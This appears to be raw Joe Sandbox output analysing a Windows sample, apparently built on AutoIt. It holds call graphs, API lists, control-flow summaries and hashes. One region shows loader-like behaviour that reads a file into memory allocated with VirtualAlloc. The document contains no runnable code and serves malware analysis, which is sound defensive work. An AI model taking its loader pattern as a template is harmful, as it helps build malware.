API calls 3 library calls 84670->84890 84673 40b528 84673->84664 84674 430aae 84678 4092c0 VariantClear 84674->84678 84676->84674 84679 40b3f2 84676->84679 84690 40b4fd ctype 84676->84690 84677 430dc9 84677->84677 84678->84673 84680 40b429 84679->84680 84681 430ae9 VariantClear 84679->84681 84688 40b476 ctype 84679->84688 84683 40b43b ctype 84680->84683 84891 40e380 VariantClear ctype 84680->84891 84681->84683 84682 430d41 VariantClear 84682->84690 84686 41171a 75 API calls 84683->84686 84683->84688 84685 40b4eb 84685->84690 84892 40e380 VariantClear ctype 84685->84892 84686->84688 84688->84685 84689 430d08 ctype 84688->84689 84689->84682 84689->84690 84690->84673 84893 45e62e 116 API calls 3 library calls 84690->84893 84692 409386 84691->84692 84696 409395 84691->84696 84894 4042f0 75 API calls __cinit 84692->84894 84695 42fba9 84898 45e62e 116 API calls 3 library calls 84695->84898 84696->84695 84698 409484 ctype 84696->84698 84699 42fc07 84696->84699 84701 42fc85 84696->84701 84703 42fcd8 84696->84703 84705 42fd4f 84696->84705 84709 42fd39 84696->84709 84712 40946f 84696->84712 84716 40947b 84696->84716 84718 4094c1 84696->84718 84720 4092c0 VariantClear 84696->84720 84897 453155 75 API calls 84696->84897 84899 40c620 118 API calls 84696->84899 84901 45e62e 116 API calls 3 library calls 84696->84901 84698->84664 84900 45e62e 116 API calls 3 library calls 84699->84900 84902 4781ae 140 API calls 84701->84902 84904 47f2b4 174 API calls 84703->84904 84707 4092c0 VariantClear 84705->84707 84707->84698 84708 42fc9c 84708->84698 84903 45e62e 116 API calls 3 library calls 84708->84903 84906 45e62e 116 API calls 3 library calls 84709->84906 84711 42fce9 84711->84698 84905 45e62e 116 API calls 3 library calls 84711->84905 84895 409210 VariantClear 84712->84895 84719 4092c0 VariantClear 84716->84719 84718->84698 84896 404260 76 API calls 84718->84896 84719->84698 84720->84696 84722 4094e1 84723 4092c0 VariantClear 84722->84723 84723->84698 84907 409110 117 API calls 
84724->84907 84726 42ceb6 84917 410ae0 VariantClear ctype 84726->84917 84728 42cebf 84729 40906e 84729->84726 84730 42cea9 84729->84730 84732 4090a4 84729->84732 84916 45e62e 116 API calls 3 library calls 84730->84916 84908 404160 84732->84908 84735 4090f0 ctype 84735->84664 84736 4092c0 VariantClear 84737 4090be ctype 84736->84737 84737->84735 84737->84736 84739 4292e3 84738->84739 84740 40d30c 84738->84740 84741 429323 84739->84741 84742 4292fd TranslateAcceleratorW 84739->84742 84740->84664 84741->84664 84742->84740 84744 4296d0 84743->84744 84745 40d32f 84743->84745 84744->84664 84746 42972a IsDialogMessageW 84745->84746 84747 40d33c 84745->84747 85052 4340ec GetClassLongW 84745->85052 84746->84745 84746->84747 84747->84664 84750 409a66 _wcslen 84749->84750 84751 41171a 75 API calls 84750->84751 84812 40aade _memcpy_s ctype 84750->84812 84752 409a9c _memcpy_s 84751->84752 84754 41171a 75 API calls 84752->84754 84756 409abd 84754->84756 84755 42cee9 84757 41171a 75 API calls 84755->84757 84758 409aeb CharUpperBuffW 84756->84758 84760 409b09 ctype 84756->84760 84756->84812 84797 42cf10 _memcpy_s 84757->84797 84758->84760 84802 409b88 ctype 84760->84802 85055 47d10e 150 API calls 84760->85055 84762 4092c0 VariantClear 84763 42e5e0 84762->84763 85087 410ae0 VariantClear ctype 84763->85087 84765 42e5f2 84766 409e4a 84768 41171a 75 API calls 84766->84768 84773 409ea4 84766->84773 84766->84797 84767 40aa5b 84770 41171a 75 API calls 84767->84770 84768->84773 84769 41171a 75 API calls 84769->84802 84787 40aa81 _memcpy_s ctype 84770->84787 84771 409ed0 84775 42d50d 84771->84775 84833 409ef8 _memcpy_s ctype 84771->84833 85065 40b800 VariantClear VariantClear ctype 84771->85065 84773->84771 84774 41171a 75 API calls 84773->84774 84776 42d480 84774->84776 84781 42d527 84775->84781 85066 40b800 VariantClear VariantClear ctype 84775->85066 84780 42d491 84776->84780 85061 44b3f6 75 API calls 84776->85061 84777 42d195 VariantClear 84777->84802 84778 40a3a7 84785 40a415 
84778->84785 84832 42db5c 84778->84832 85062 40df50 75 API calls 84780->85062 84781->84833 85067 40e2e0 VariantClear ctype 84781->85067 84782 4092c0 VariantClear 84782->84802 84789 41171a 75 API calls 84785->84789 84795 41171a 75 API calls 84787->84795 84804 40a41c 84789->84804 84793 42db96 85073 45e62e 116 API calls 3 library calls 84793->85073 84795->84812 84796 42d4a6 85063 4530b3 75 API calls 84796->85063 85086 45e62e 116 API calls 3 library calls 84797->85086 84799 42d128 84801 4092c0 VariantClear 84799->84801 84800 42d4d7 85064 4530b3 75 API calls 84800->85064 84806 42d131 84801->84806 84802->84766 84802->84767 84802->84769 84802->84777 84802->84782 84802->84787 84802->84797 84802->84799 84803 42d20c 84802->84803 84810 42dbb9 84802->84810 85056 40c3e0 75 API calls 84802->85056 85057 40c620 118 API calls 84802->85057 85059 40be00 75 API calls 2 library calls 84802->85059 85060 40e380 VariantClear ctype 84802->85060 84803->84664 84817 40a481 84804->84817 85074 40c8a0 VariantClear ctype 84804->85074 85058 410ae0 VariantClear ctype 84806->85058 84810->84762 85054 401380 75 API calls 84812->85054 84813 41171a 75 API calls 84813->84833 84815 44b3f6 75 API calls 84815->84833 84816 4092c0 VariantClear 84846 40a534 _memcpy_s ctype 84816->84846 84818 40a4ed 84817->84818 84820 42dc1e VariantClear 84817->84820 84817->84846 84824 40a4ff ctype 84818->84824 85075 40e380 VariantClear ctype 84818->85075 84819 402cc0 75 API calls 84819->84833 84820->84824 84823 41171a 75 API calls 84823->84846 84824->84823 84824->84846 84828 42deb6 VariantClear 84828->84846 84829 411421 74 API calls __cinit 84829->84833 84830 40a73c 84834 42e237 84830->84834 84840 40a76b 84830->84840 84831 40e380 VariantClear 84831->84846 85072 4721e5 VariantClear 84832->85072 84833->84778 84833->84793 84833->84812 84833->84813 84833->84815 84833->84819 84833->84829 84833->84832 84839 40a053 84833->84839 85068 45ee98 75 API calls 84833->85068 85069 4019e0 76 API calls 84833->85069 85070 404260 76 API calls 
84833->85070 85071 409210 VariantClear 84833->85071 85079 46e709 VariantClear VariantClear ctype 84834->85079 84835 42df47 VariantClear 84835->84846 84836 42dfe9 VariantClear 84836->84846 84838 40a7a2 84853 40a7ad ctype 84838->84853 85080 40b800 VariantClear VariantClear ctype 84838->85080 84839->84664 84840->84838 84864 40a800 ctype 84840->84864 85053 40b800 VariantClear VariantClear ctype 84840->85053 84843 40a8b0 84858 40a8c2 ctype 84843->84858 85082 40e380 VariantClear ctype 84843->85082 84844 42e312 84848 42e337 VariantClear 84844->84848 84844->84858 84845 41171a 75 API calls 84847 42dd10 VariantInit VariantCopy 84845->84847 84846->84816 84846->84828 84846->84830 84846->84831 84846->84834 84846->84835 84846->84836 84846->84845 84851 41171a 75 API calls 84846->84851 85076 46e9cd 75 API calls 84846->85076 85077 409210 VariantClear 84846->85077 85078 44cc6c VariantClear ctype 84846->85078 84847->84846 84850 42dd30 VariantClear 84847->84850 84848->84858 84849 42e3b2 84859 42e3da VariantClear 84849->84859 84865 40a91a ctype 84849->84865 84850->84846 84851->84846 84854 40a7ee 84853->84854 84857 42e2a7 VariantClear 84853->84857 84853->84864 84854->84864 85081 40e380 VariantClear ctype 84854->85081 84856 40a908 84856->84865 85083 40e380 VariantClear ctype 84856->85083 84857->84864 84858->84849 84858->84856 84859->84865 84860 42e47f 84866 42e4a3 VariantClear 84860->84866 84871 40a957 ctype 84860->84871 84862 40a945 84862->84871 85084 40e380 VariantClear ctype 84862->85084 84864->84843 84864->84844 84865->84860 84865->84862 84866->84871 84868 40aa22 ctype 84868->84664 84869 42e559 VariantClear 84869->84871 84871->84868 84871->84869 85085 40e380 VariantClear ctype 84871->85085 84872->84629 84873->84657 84874->84657 84875->84657 84876->84657 84877->84657 84878->84657 84880 40412e 84879->84880 84881 4092c0 VariantClear 84880->84881 84882 404138 84881->84882 84882->84652 84883->84657 84884->84657 84885->84664 84886->84627 84887->84664 84888->84664 84889->84670 84890->84674 
84891->84683 84892->84690 84893->84677 84894->84696 84895->84716 84896->84722 84897->84696 84898->84698 84899->84696 84900->84698 84901->84696 84902->84708 84903->84698 84904->84711 84905->84698 84906->84705 84907->84729 84909 4092c0 VariantClear 84908->84909 84910 40416e 84909->84910 84911 404120 VariantClear 84910->84911 84912 40419b 84911->84912 84918 4734b7 84912->84918 84962 40efe0 84912->84962 84913 4041c6 84913->84726 84913->84737 84916->84726 84917->84728 84919 453063 111 API calls 84918->84919 84920 4734d7 84919->84920 84921 473545 84920->84921 84922 47350c 84920->84922 84970 463c42 84921->84970 84924 4092c0 VariantClear 84922->84924 84929 473514 84924->84929 84925 473558 84926 47355c 84925->84926 84942 473595 84925->84942 84927 4092c0 VariantClear 84926->84927 84937 473564 84927->84937 84928 473616 84983 463d7e 84928->84983 84929->84913 84931 473622 84933 473697 84931->84933 84934 47362c 84931->84934 84932 453063 111 API calls 84932->84942 85017 457838 84933->85017 84938 4092c0 VariantClear 84934->84938 84937->84913 84940 473634 84938->84940 84940->84913 84941 473655 84945 4092c0 VariantClear 84941->84945 84942->84928 84942->84932 84942->84941 85029 462f5a 87 API calls __wcsicoll 84942->85029 84956 47365d 84945->84956 84946 4736b0 85030 45e62e 116 API calls 3 library calls 84946->85030 84947 4736c9 85031 40e7e0 76 API calls 84947->85031 84950 4736db 84960 4736ff 84950->84960 85032 40d030 76 API calls 84950->85032 84951 4736ba GetCurrentProcess TerminateProcess 84951->84947 84953 473731 84958 473744 FreeLibrary 84953->84958 84959 47374b 84953->84959 84954 4736f1 85033 46b945 134 API calls 2 library calls 84954->85033 84956->84913 84958->84959 84959->84913 84960->84953 85034 40d030 76 API calls 84960->85034 85035 46b945 134 API calls 2 library calls 84960->85035 84963 40eff5 CreateFileW 84962->84963 84964 4299bf 84962->84964 84966 40f017 84963->84966 84965 4299c4 CreateFileW 84964->84965 84964->84966 84965->84966 84967 4299ea 84965->84967 84966->84913 85051 
40e0d0 SetFilePointerEx SetFilePointerEx 84967->85051 84969 4299f5 84969->84966 85036 45335b 76 API calls 84970->85036 84972 463c5d 85037 442c52 80 API calls _wcslen 84972->85037 84974 463c72 84975 463cac 84974->84975 84977 40c060 75 API calls 84974->84977 84982 463cf7 84975->84982 85039 462f5a 87 API calls __wcsicoll 84975->85039 84978 463c8e 84977->84978 85038 4608ce 75 API calls _memcpy_s 84978->85038 84980 463ca4 84981 40c740 75 API calls 84980->84981 84981->84975 84982->84925 84984 453063 111 API calls 84983->84984 84985 463d99 84984->84985 84986 463de0 84985->84986 84987 463dca 84985->84987 85041 40c760 78 API calls 84986->85041 85040 453081 111 API calls 84987->85040 84990 463dd0 LoadLibraryW 84992 463e09 84990->84992 84991 463de7 84996 463e19 84991->84996 85042 40c760 78 API calls 84991->85042 84993 463e3e 84992->84993 84992->84996 84998 463e4e 84993->84998 84999 463e7b 84993->84999 84995 463dfb 84995->84996 85043 40c760 78 API calls 84995->85043 84996->84931 85044 40d500 75 API calls 84998->85044 85046 40c760 78 API calls 84999->85046 85002 463e82 GetProcAddress 85006 463e90 85002->85006 85003 463e57 85045 45efe7 77 API calls ctype 85003->85045 85005 463e62 GetProcAddress 85008 463e79 85005->85008 85006->84996 85007 463edf 85006->85007 85006->85008 85007->84996 85010 463eef FreeLibrary 85007->85010 85008->85006 85047 403470 75 API calls _memcpy_s 85008->85047 85010->84996 85011 463eb4 85048 40d500 75 API calls 85011->85048 85013 463ebd 85049 45efe7 77 API calls ctype 85013->85049 85015 463ec8 GetProcAddress 85050 401330 ctype 85015->85050 85018 457a4c 85017->85018 85024 45785f _strcat _wcslen _wcscpy ctype 85017->85024 85025 410d40 85018->85025 85019 443576 78 API calls 85019->85024 85020 40c760 78 API calls 85020->85024 85021 453081 111 API calls 85021->85024 85022 4138ba 67 API calls _malloc 85022->85024 85023 40f580 77 API calls 85023->85024 85024->85018 85024->85019 85024->85020 85024->85021 85024->85022 85024->85023 85027 410d55 85025->85027 85026 
410ded VirtualProtect 85028 410dbb 85026->85028 85027->85026 85027->85028 85028->84946 85028->84947 85029->84942 85030->84951 85031->84950 85032->84954 85033->84960 85034->84960 85035->84960 85036->84972 85037->84974 85038->84980 85039->84982 85040->84990 85041->84991 85042->84995 85043->84992 85044->85003 85045->85005 85046->85002 85047->85011 85048->85013 85049->85015 85050->85007 85051->84969 85052->84745 85053->84838 85054->84755 85055->84760 85056->84802 85057->84802 85058->84868 85059->84802 85060->84802 85061->84780 85062->84796 85063->84800 85064->84771 85065->84775 85066->84781 85067->84833 85068->84833 85069->84833 85070->84833 85071->84833 85072->84793 85073->84810 85074->84804 85075->84824 85076->84846 85077->84846 85078->84846 85079->84838 85080->84853 85081->84864 85082->84858 85083->84865 85084->84871 85085->84871 85086->84810 85087->84765 85088 42919b 85093 40ef10 85088->85093 85091 411421 __cinit 74 API calls 85092 4291aa 85091->85092 85094 41171a 75 API calls 85093->85094 85095 40ef17 85094->85095 85096 42ad48 85095->85096 85101 40ef40 74 API calls __cinit 85095->85101 85098 40ef2a 85102 40e470 85098->85102 85101->85098 85103 40c060 75 API calls 85102->85103 85104 40e483 GetVersionExW 85103->85104 85105 4021e0 75 API calls 85104->85105 85106 40e4bb 85105->85106 85128 40e600 85106->85128 85112 42accc 85114 42ad28 GetSystemInfo 85112->85114 85117 42ad38 GetSystemInfo 85114->85117 85115 40e557 GetCurrentProcess 85148 40ee30 LoadLibraryA GetProcAddress 85115->85148 85116 40e56c 85116->85117 85141 40eee0 85116->85141 85121 40e5c9 85145 40eea0 85121->85145 85124 40e5e0 85126 40e5f1 FreeLibrary 85124->85126 85127 40e5f4 85124->85127 85125 40e5dd FreeLibrary 85125->85124 85126->85127 85127->85091 85129 40e60b 85128->85129 85130 40c740 75 API calls 85129->85130 85131 40e4c2 85130->85131 85132 40e620 85131->85132 85134 40e62a 85132->85134 85133 42ac93 85134->85133 85135 40c740 75 API calls 85134->85135 85136 40e4ce 85135->85136 85136->85112 85137 40ee70 
85136->85137 85138 40e551 85137->85138 85139 40ee76 LoadLibraryA 85137->85139 85138->85115 85138->85116 85139->85138 85140 40ee87 GetProcAddress 85139->85140 85140->85138 85142 40e5bf 85141->85142 85143 40eee6 LoadLibraryA 85141->85143 85142->85114 85142->85121 85143->85142 85144 40eef7 GetProcAddress 85143->85144 85144->85142 85149 40eec0 LoadLibraryA GetProcAddress 85145->85149 85147 40e5d3 GetNativeSystemInfo 85147->85124 85147->85125 85148->85116 85149->85147 85150 42e89e 85157 40c000 85150->85157 85152 42e8ac 85153 409a40 165 API calls 85152->85153 85154 42e8ca 85153->85154 85168 44b92e VariantClear 85154->85168 85156 42f3ae 85158 40c014 85157->85158 85159 40c007 85157->85159 85161 40c01a 85158->85161 85162 40c02c 85158->85162 85169 409210 VariantClear 85159->85169 85170 409210 VariantClear 85161->85170 85163 41171a 75 API calls 85162->85163 85167 40c033 85163->85167 85164 40c00f 85164->85152 85166 40c023 85166->85152 85167->85152 85168->85156 85169->85164 85170->85166 85171 3ecc573 85172 3ecc57a 85171->85172 85173 3ecc618 85172->85173 85174 3ecc582 85172->85174 85191 3eccec8 9 API calls 85173->85191 85178 3ecc228 85174->85178 85177 3ecc5ff 85179 3ec9c18 GetPEB 85178->85179 85188 3ecc2c7 85179->85188 85181 3ecc2f8 CreateFileW 85184 3ecc305 85181->85184 85181->85188 85182 3ecc321 VirtualAlloc 85183 3ecc342 ReadFile 85182->85183 85182->85184 85183->85184 85187 3ecc360 VirtualAlloc 85183->85187 85185 3ecc514 VirtualFree 85184->85185 85186 3ecc522 85184->85186 85185->85186 85186->85177 85187->85184 85187->85188 85188->85182 85188->85184 85189 3ecc428 CloseHandle 85188->85189 85190 3ecc438 VirtualFree 85188->85190 85192 3ecd138 GetPEB 85188->85192 85189->85188 85190->85188 85191->85177 85193 3ecd162 85192->85193 85193->85181
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH$4RH
                                                                              • API String ID: 1143807570-2085553193
                                                                              • Opcode ID: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                              • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                              • Opcode Fuzzy Hash: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                              • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                                                              Control-flow Graph

                                                                              control_flow_graph 1266 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1275 40e506-40e509 1266->1275 1276 42accc-42acd1 1266->1276 1279 40e540-40e555 call 40ee70 1275->1279 1280 40e50b-40e51c 1275->1280 1277 42acd3-42acdb 1276->1277 1278 42acdd-42ace0 1276->1278 1281 42ad12-42ad20 1277->1281 1282 42ace2-42aceb 1278->1282 1283 42aced-42acf0 1278->1283 1297 40e557-40e573 GetCurrentProcess call 40ee30 1279->1297 1298 40e579-40e5a8 1279->1298 1284 40e522-40e525 1280->1284 1285 42ac9b-42aca7 1280->1285 1296 42ad28-42ad2d GetSystemInfo 1281->1296 1282->1281 1283->1281 1287 42acf2-42ad06 1283->1287 1284->1279 1288 40e527-40e537 1284->1288 1290 42acb2-42acba 1285->1290 1291 42aca9-42acad 1285->1291 1292 42ad08-42ad0c 1287->1292 1293 42ad0e 1287->1293 1294 42acbf-42acc7 1288->1294 1295 40e53d 1288->1295 1290->1279 1291->1279 1292->1281 1293->1281 1294->1279 1295->1279 1299 42ad38-42ad3d GetSystemInfo 1296->1299 1297->1298 1307 40e575 1297->1307 1298->1299 1300 40e5ae-40e5c3 call 40eee0 1298->1300 1300->1296 1305 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1300->1305 1310 40e5e0-40e5ef 1305->1310 1311 40e5dd-40e5de FreeLibrary 1305->1311 1307->1298 1312 40e5f1-40e5f2 FreeLibrary 1310->1312 1313 40e5f4-40e5ff 1310->1313 1311->1310 1312->1313
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                              • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                              • String ID: pMH
                                                                              • API String ID: 2923339712-2522892712
                                                                              • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                              • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                              • API String ID: 2574300362-3542929980
                                                                              • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                              • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                              • __wsplitpath.LIBCMT ref: 00410C61
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcsncat.LIBCMT ref: 00410C78
                                                                              • __wmakepath.LIBCMT ref: 00410C94
                                                                                • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • _wcscpy.LIBCMT ref: 00410CCC
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                              • _wcscat.LIBCMT ref: 00429C43
                                                                              • _wcslen.LIBCMT ref: 00429C55
                                                                              • _wcslen.LIBCMT ref: 00429C66
                                                                              • _wcscat.LIBCMT ref: 00429C80
                                                                              • _wcsncpy.LIBCMT ref: 00429CC0
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                              • API String ID: 1004883554-2276155026
                                                                              • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                              • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                              • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                              • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                              APIs
                                                                                • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                              • timeGetTime.WINMM ref: 00409880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                              • String ID:
                                                                              • API String ID: 3219444185-0
                                                                              • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                              • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                              • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                              • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                                               Control-flow Graph
                                                                               (rendered graph not reproduced; recovered from it: entry block 0x4161c2, basic blocks 0x4161c2-0x41630f, calls to 0x41aa31, 0x41616a, 0x416e29, 0x41843a, 0x41b669, 0x4117af, GetCommandLineW, 0x42235f, 0x4222b1, 0x422082, 0x41186e, 0x42203c, 0x40d7f0, 0x411a1f, 0x411a4b, 0x4171d1)
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                              • String ID:
                                                                              • API String ID: 2477803136-0
                                                                              • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                              • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                                                                              • Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
